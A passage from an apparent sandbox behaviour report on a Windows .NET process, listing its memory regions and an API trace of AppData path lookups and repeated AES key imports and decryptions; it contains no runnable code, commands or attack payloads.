= 0x536ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 2133 start_va = 0x5370000 end_va = 0x537ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 2134 start_va = 0x5350000 end_va = 0x555afff monitored = 0 entry_point = 0x53fb0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 2135 start_va = 0x6ffe0000 end_va = 0x701eefff monitored = 0 entry_point = 0x7008b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 2136 start_va = 0x5070000 end_va = 0x5070fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2137 start_va = 0x5350000 end_va = 0x5351fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005350000" filename = "" Region: id = 2138 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2139 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 2140 start_va = 0x5360000 end_va = 0x536ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 2141 start_va = 0x5360000 end_va = 0x536ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 2142 start_va = 0x5360000 end_va = 0x536ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 2143 start_va = 0x5360000 end_va = 0x536ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 2144 start_va = 0x5360000 end_va = 0x536ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 2145 start_va = 0x5360000 end_va = 0x536ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 2146 start_va = 0x5360000 end_va = 0x536ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 2147 start_va = 0x5360000 end_va = 0x536ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 2148 start_va = 0x5370000 end_va = 0x537ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 2149 start_va = 0x5380000 end_va = 0x538ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005380000" filename = "" Region: id = 2150 start_va = 0x5380000 end_va = 0x538ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005380000" filename = "" Region: id = 2151 start_va = 0x5380000 end_va = 0x538ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005380000" filename = "" Region: id = 2152 start_va = 0x5380000 end_va = 0x538ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005380000" filename = "" Region: id = 2253 start_va = 0x5380000 end_va = 0x53bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005380000" filename = "" Region: id = 2254 start_va = 0x53c0000 end_va = 0x54bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000053c0000" filename = "" Region: id = 2255 start_va = 0x54c0000 end_va = 0x54fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054c0000" filename = "" Region: id = 2256 start_va = 0x5500000 end_va = 0x553ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 2514 start_va = 0x54c0000 end_va = 0x54cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054c0000" filename = "" Region: id = 2520 start_va = 0x54c0000 end_va = 0x54cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054c0000" filename = "" Region: id = 2521 start_va = 0x54c0000 end_va = 0x54cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054c0000" filename = "" Region: id = 2522 start_va = 0x54c0000 end_va = 0x54cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054c0000" filename = "" Region: id = 2704 start_va = 0x54c0000 end_va = 0x54cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054c0000" filename = "" Region: id = 2705 start_va = 0x725b0000 end_va = 0x726fafff monitored = 0 entry_point = 0x72611660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 2706 start_va = 0x54c0000 end_va = 0x54c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2707 start_va = 0x54d0000 end_va = 0x5514fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 2708 start_va = 0x5520000 end_va = 0x5523fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2709 start_va = 0x5530000 end_va = 0x55bdfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 2711 start_va = 0x55c0000 end_va = 0x59bafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000055c0000" filename = "" Region: id = 2712 start_va = 0x59c0000 end_va = 0x59c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 2713 start_va = 0x59d0000 end_va = 0x59e2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 2714 start_va = 0x59f0000 end_va = 0x59f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000059f0000" filename = "" Region: id = 2715 start_va = 0x5a00000 end_va = 0x5afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 2716 start_va = 0x70a40000 end_va = 0x70bbdfff monitored = 0 entry_point = 0x70abc630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2717 start_va = 0x72180000 end_va = 0x7244afff monitored = 0 entry_point = 0x723bc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2718 start_va = 0x59c0000 end_va = 0x59c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000059c0000" filename = "" Region: id = 2719 start_va = 0x5b00000 end_va = 0x5b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b00000" filename = "" Region: id = 2720 start_va = 0x5b40000 end_va = 0x5c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b40000" filename = "" Region: id = 2721 start_va = 0x5c40000 end_va = 0x5c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c40000" filename = "" Region: id = 2722 start_va = 0x5c80000 end_va = 0x5cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c80000" filename = "" Thread: id = 126 os_tid = 0x10bc [0177.673] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0177.973] RoInitialize () returned 0x1 [0177.974] RoUninitialize () returned 0x0 [0179.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x19ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0179.321] IsAppThemed () returned 0x1 [0179.330] CoTaskMemAlloc (cb=0xf0) returned 0x592ba0 [0179.330] CreateActCtxA (pActCtx=0x19f414) returned 0x59d7b4 [0179.334] CoTaskMemFree (pv=0x592ba0) [0179.351] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1dc [0179.351] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1e2 [0179.465] CoTaskMemAlloc (cb=0x20c) returned 0x592ba0 [0179.465] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x592ba0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0179.473] CoTaskMemFree (pv=0x592ba0) [0179.474] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19d7d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0182.448] CryptAcquireContextW (in: phProv=0x19f42c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f42c*=0x587178) returned 1 [0182.453] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x1 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.454] CoTaskMemAlloc (cb=0x20) returned 0x59d708 [0182.454] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d708, pdwDataLen=0x19f3f0, dwFlags=0x1 | out: pbData=0x59d708, pdwDataLen=0x19f3f0) returned 1 [0182.456] CoTaskMemFree (pv=0x59d708) [0182.456] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.456] CoTaskMemAlloc (cb=0x20) returned 0x59d708 [0182.456] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d708, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d708, pdwDataLen=0x19f3f0) returned 1 [0182.456] CoTaskMemFree (pv=0x59d708) [0182.456] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.456] CoTaskMemAlloc (cb=0x20) returned 0x59d708 [0182.456] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d708, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d708, pdwDataLen=0x19f3f0) returned 1 [0182.456] CoTaskMemFree (pv=0x59d708) [0182.457] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.457] CoTaskMemAlloc (cb=0x20) returned 0x59d708 [0182.457] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d708, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d708, pdwDataLen=0x19f3f0) returned 1 [0182.457] CoTaskMemFree (pv=0x59d708) [0182.457] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.457] CoTaskMemAlloc (cb=0x20) returned 0x59d500 [0182.457] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d500, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d500, pdwDataLen=0x19f3f0) returned 1 [0182.457] CoTaskMemFree (pv=0x59d500) [0182.457] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.457] CoTaskMemAlloc (cb=0x20) returned 0x59d708 [0182.457] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d708, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d708, pdwDataLen=0x19f3f0) returned 1 [0182.457] CoTaskMemFree (pv=0x59d708) [0182.457] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.457] CoTaskMemAlloc (cb=0x20) returned 0x59d758 [0182.457] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d758, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d758, pdwDataLen=0x19f3f0) returned 1 [0182.458] CoTaskMemFree (pv=0x59d758) [0182.458] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.458] CoTaskMemAlloc (cb=0x20) returned 0x59d708 [0182.458] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d708, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d708, pdwDataLen=0x19f3f0) returned 1 [0182.458] CoTaskMemFree (pv=0x59d708) [0182.458] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.458] CoTaskMemAlloc (cb=0x20) returned 0x59d528 [0182.458] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d528, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d528, pdwDataLen=0x19f3f0) returned 1 [0182.458] CoTaskMemFree (pv=0x59d528) [0182.458] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.458] CoTaskMemAlloc (cb=0x20) returned 0x59d528 [0182.458] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d528, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d528, pdwDataLen=0x19f3f0) returned 1 [0182.459] CoTaskMemFree (pv=0x59d528) [0182.459] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.459] CoTaskMemAlloc (cb=0x20) returned 0x59d708 [0182.459] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d708, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d708, pdwDataLen=0x19f3f0) returned 1 [0182.459] CoTaskMemFree (pv=0x59d708) [0182.459] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.459] CoTaskMemAlloc (cb=0x20) returned 0x59d708 [0182.459] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d708, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d708, pdwDataLen=0x19f3f0) returned 1 [0182.459] CoTaskMemFree (pv=0x59d708) [0182.459] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.459] CoTaskMemAlloc (cb=0x20) returned 0x59d708 [0182.459] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d708, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d708, pdwDataLen=0x19f3f0) returned 1 [0182.459] CoTaskMemFree (pv=0x59d708) [0182.460] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.460] CoTaskMemAlloc (cb=0x20) returned 0x59d708 [0182.460] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d708, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d708, pdwDataLen=0x19f3f0) returned 1 [0182.460] CoTaskMemFree (pv=0x59d708) [0182.460] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.460] CoTaskMemAlloc (cb=0x20) returned 0x59d500 [0182.460] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d500, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d500, pdwDataLen=0x19f3f0) returned 1 [0182.460] CoTaskMemFree (pv=0x59d500) [0182.460] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.460] CoTaskMemAlloc (cb=0x20) returned 0x59d708 [0182.460] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d708, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d708, pdwDataLen=0x19f3f0) returned 1 [0182.460] CoTaskMemFree (pv=0x59d708) [0182.460] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.460] CoTaskMemAlloc (cb=0x20) returned 0x59d708 [0182.461] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d708, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d708, pdwDataLen=0x19f3f0) returned 1 [0182.461] CoTaskMemFree (pv=0x59d708) [0182.461] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.461] CoTaskMemAlloc (cb=0x20) returned 0x59d730 [0182.461] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d730, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d730, pdwDataLen=0x19f3f0) returned 1 [0182.461] CoTaskMemFree (pv=0x59d730) [0182.461] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.461] CoTaskMemAlloc (cb=0x20) returned 0x59d500 [0182.461] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d500, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d500, pdwDataLen=0x19f3f0) returned 1 [0182.462] CoTaskMemFree (pv=0x59d500) [0182.462] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0182.462] CoTaskMemAlloc (cb=0x20) returned 0x59d708 [0182.462] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x59d708, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x59d708, pdwDataLen=0x19f3f0) returned 1 [0182.462] CoTaskMemFree (pv=0x59d708) [0182.462] CryptGetProvParam (in: hProv=0x587178, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 0 [0182.473] CryptImportKey (in: hProv=0x587178, pbData=0x23d1a4c, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x19f3fc | out: phKey=0x19f3fc*=0x5a02d0) returned 1 [0182.477] CryptContextAddRef (hProv=0x587178, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.497] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x19f41c | out: pfEnabled=0x19f41c) returned 0x0 [0182.510] CryptContextAddRef (hProv=0x587178, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.511] CryptDuplicateKey (in: hKey=0x5a02d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x19f3ec | out: phKey=0x19f3ec*=0x5a0650) returned 1 [0182.511] CryptContextAddRef (hProv=0x587178, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.512] CryptSetKeyParam (hKey=0x5a0650, dwParam=0x4, pbData=0x23d241c*=0x1, dwFlags=0x0) returned 1 [0182.512] CryptSetKeyParam (hKey=0x5a0650, dwParam=0x1, pbData=0x23d23e8, dwFlags=0x0) returned 1 [0182.516] CryptDecrypt (in: hKey=0x5a0650, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23d24fc, pdwDataLen=0x19f42c | out: pbData=0x23d24fc, pdwDataLen=0x19f42c) returned 1 [0182.517] CryptDecrypt (in: hKey=0x5a0650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x23d2548, pdwDataLen=0x19f42c | out: pbData=0x23d2548, pdwDataLen=0x19f42c) returned 0 [0182.518] CryptDestroyKey (hKey=0x5a02d0) returned 1 [0182.518] CryptReleaseContext (hProv=0x587178, dwFlags=0x0) returned 1 [0182.518] CryptReleaseContext (hProv=0x587178, dwFlags=0x0) returned 1 [0182.519] CryptAcquireContextW (in: phProv=0x19f42c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f42c*=0x587200) returned 1 [0182.520] CryptImportKey (in: hProv=0x587200, pbData=0x23d26e0, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x19f3fc | out: phKey=0x19f3fc*=0x5a0450) returned 1 [0182.520] CryptContextAddRef (hProv=0x587200, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.521] CryptContextAddRef (hProv=0x587200, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.521] CryptDuplicateKey (in: hKey=0x5a0450, pdwReserved=0x0, dwFlags=0x0, phKey=0x19f3ec | out: phKey=0x19f3ec*=0x5a0350) returned 1 [0182.521] CryptContextAddRef (hProv=0x587200, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.521] CryptSetKeyParam (hKey=0x5a0350, dwParam=0x4, pbData=0x23d2e40*=0x1, dwFlags=0x0) returned 1 [0182.521] CryptSetKeyParam (hKey=0x5a0350, dwParam=0x1, pbData=0x23d2e0c, dwFlags=0x0) returned 1 [0182.522] CryptDecrypt (in: hKey=0x5a0350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23d2f20, pdwDataLen=0x19f42c | out: pbData=0x23d2f20, pdwDataLen=0x19f42c) returned 1 [0182.522] CryptDecrypt (in: hKey=0x5a0350, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x23d2f68, pdwDataLen=0x19f42c | out: pbData=0x23d2f68, pdwDataLen=0x19f42c) returned 0 [0182.522] CryptDestroyKey (hKey=0x5a0450) returned 1 [0182.522] CryptReleaseContext (hProv=0x587200, dwFlags=0x0) returned 1 [0182.522] CryptReleaseContext (hProv=0x587200, dwFlags=0x0) returned 1 [0182.522] CryptAcquireContextW (in: phProv=0x19f42c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f42c*=0x586f58) returned 1 [0182.523] CryptImportKey (in: hProv=0x586f58, pbData=0x23d30f8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x19f3fc | out: phKey=0x19f3fc*=0x5a0450) returned 1 [0182.524] CryptContextAddRef (hProv=0x586f58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.524] CryptContextAddRef (hProv=0x586f58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.524] CryptDuplicateKey (in: hKey=0x5a0450, pdwReserved=0x0, dwFlags=0x0, phKey=0x19f3ec | out: phKey=0x19f3ec*=0x5a0490) returned 1 [0182.524] CryptContextAddRef (hProv=0x586f58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.525] CryptSetKeyParam (hKey=0x5a0490, dwParam=0x4, pbData=0x23d38b8*=0x1, dwFlags=0x0) returned 1 [0182.525] CryptSetKeyParam (hKey=0x5a0490, dwParam=0x1, pbData=0x23d3884, dwFlags=0x0) returned 1 [0182.525] CryptDecrypt (in: hKey=0x5a0490, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23d39bc, pdwDataLen=0x19f3fc | out: pbData=0x23d39bc, pdwDataLen=0x19f3fc) returned 1 [0182.525] CryptDecrypt (in: hKey=0x5a0490, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23d3a2c, pdwDataLen=0x19f42c | out: pbData=0x23d3a2c, pdwDataLen=0x19f42c) returned 1 [0182.525] CryptDecrypt (in: hKey=0x5a0490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x23d3a70, pdwDataLen=0x19f42c | out: pbData=0x23d3a70, pdwDataLen=0x19f42c) returned 0 [0182.525] CryptDestroyKey (hKey=0x5a0450) returned 1 [0182.525] CryptReleaseContext (hProv=0x586f58, dwFlags=0x0) returned 1 [0182.525] CryptReleaseContext (hProv=0x586f58, dwFlags=0x0) returned 1 [0182.525] CryptAcquireContextW (in: phProv=0x19f42c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f42c*=0x587068) returned 1 [0182.526] CryptImportKey (in: hProv=0x587068, pbData=0x23d3c30, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x19f3fc | out: phKey=0x19f3fc*=0x5a06d0) returned 1 [0182.527] CryptContextAddRef (hProv=0x587068, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.527] CryptContextAddRef (hProv=0x587068, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.527] CryptDuplicateKey (in: hKey=0x5a06d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x19f3ec | out: phKey=0x19f3ec*=0x5a0550) returned 1 [0182.527] CryptContextAddRef (hProv=0x587068, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.527] CryptSetKeyParam (hKey=0x5a0550, dwParam=0x4, pbData=0x23d4390*=0x1, dwFlags=0x0) returned 1 [0182.527] CryptSetKeyParam (hKey=0x5a0550, dwParam=0x1, pbData=0x23d435c, dwFlags=0x0) returned 1 [0182.528] CryptDecrypt (in: hKey=0x5a0550, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23d4470, pdwDataLen=0x19f42c | out: pbData=0x23d4470, pdwDataLen=0x19f42c) returned 1 [0182.528] CryptDecrypt (in: hKey=0x5a0550, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x23d44b8, 